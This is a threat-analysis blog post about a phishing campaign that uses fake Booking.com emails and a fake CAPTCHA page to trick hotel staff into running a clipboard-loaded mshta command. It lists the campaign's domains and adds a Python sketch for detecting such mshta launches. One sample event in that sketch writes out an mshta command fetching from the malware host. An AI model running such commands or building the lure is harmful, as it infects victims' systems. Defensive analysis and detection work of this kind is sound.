Fake Booking.com emails target hotels
Pieter Arntz · 2025-04-02 · via Threat Walkthroughs – ThreatDown by Malwarebytes

A new phishing campaign is using a famous brand to compromise hotels.

A new phishing campaign is using the Booking.com brand to target hotels, using fake Captcha websites. The attack begins with cybercriminals sending a fake Booking.com email to the hotel’s email address, asking them to confirm a booking.

Fake booking.com confirmation email

If the hotel staff go to the URL in the email, they are greeted by a website with a fake CAPTCHA popup asking them to prove they are a human.

Robot or Human?

Behind the scenes, the website has loaded a malicious mshta command into the user’s clipboard.

When they tick the CAPTCHA checkbox, the target is asked to complete a set of “Verification Steps”.

set of instructions

What the instructions actually do is paste the contents of the clipboard into a Windows command prompt and run it, which runs the mshta command that fetches and runs a remote file, setting off an attack chain that ends with the hotel’s systems being infected with a Trojan.

A compromised hotel network is a significant prize for cybercriminals, potentially offering access to payment details and other personal data that can be abused or sold.

How ThreatDown can help you

Even staff who have been trained to check that email senders are valid and to avoid links in emails will slip up from time to time, and a range of technologies can blunt the impact when they do.

IOCs

Domains used in this campaign:

  • vencys[.]com, appears in the email and redirects to the CAPTCHA site.
  • bokcentrpart[.]com, hosts the fake CAPTCHA site.
  • captpart[.]info, the site the malware is downloaded from.
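
The clipboard-to-mshta step described above leaves a recognisable process-creation record, and the sketch below triages such records against the domains listed here. It is an added example, not code from ThreatDown or from the original article. It assumes Sysmon-style field names (Image, ParentImage, CommandLine); the set of "interactive" parents, the severity labels, and the sample events with their example.test host are assumptions constructed for illustration.

```python
import re

# Campaign domains exactly as the page lists them (defanged); refanged only at runtime.
IOC_DEFANGED = ["vencys[.]com", "bokcentrpart[.]com", "captpart[.]info"]

def refang(text):
    return text.replace("[.]", ".").replace("hxxp", "http")

IOC_DOMAINS = {refang(d) for d in IOC_DEFANGED}
# Assumption: parents that suggest a command pasted by a user (prompt or Run dialog).
INTERACTIVE_PARENTS = {"cmd.exe", "explorer.exe"}
URL_HOST = re.compile(r"https?://([^/\s\"':]+)", re.IGNORECASE)

def exe_name(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(event):
    """Return (severity, reason) for a process-creation event, or None if benign."""
    if exe_name(event["Image"]) != "mshta.exe":
        return None
    match = URL_HOST.search(event["CommandLine"])
    if match is None:
        return None  # mshta opening a local .hta file: not the pattern described
    host = match.group(1).lower()
    if any(host == d or host.endswith("." + d) for d in IOC_DOMAINS):
        return ("high", "mshta fetched from campaign domain " + host.replace(".", "[.]"))
    if exe_name(event["ParentImage"]) in INTERACTIVE_PARENTS:
        return ("medium", "mshta fetched remote content from an interactive parent")
    return ("low", "mshta fetched remote content")

# Constructed sample events (not real telemetry); the URL paths are placeholders.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "mshta " + refang("hxxps://captpart[.]info/") + "constructed-path"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta https://example.test/constructed.hta"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mshta C:\Tools\inventory.hta"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]

def triage(events):
    return [classify(e) for e in events]

if __name__ == "__main__":
    for event, verdict in zip(SAMPLE_EVENTS, triage(SAMPLE_EVENTS)):
        print(verdict, "<-", event["CommandLine"].replace(".", "[.]"))
```

The medium tier matters once the listed domains rotate: a remote URL on an mshta command line launched from a prompt or the Run dialog is worth reviewing even when the host is not a known indicator.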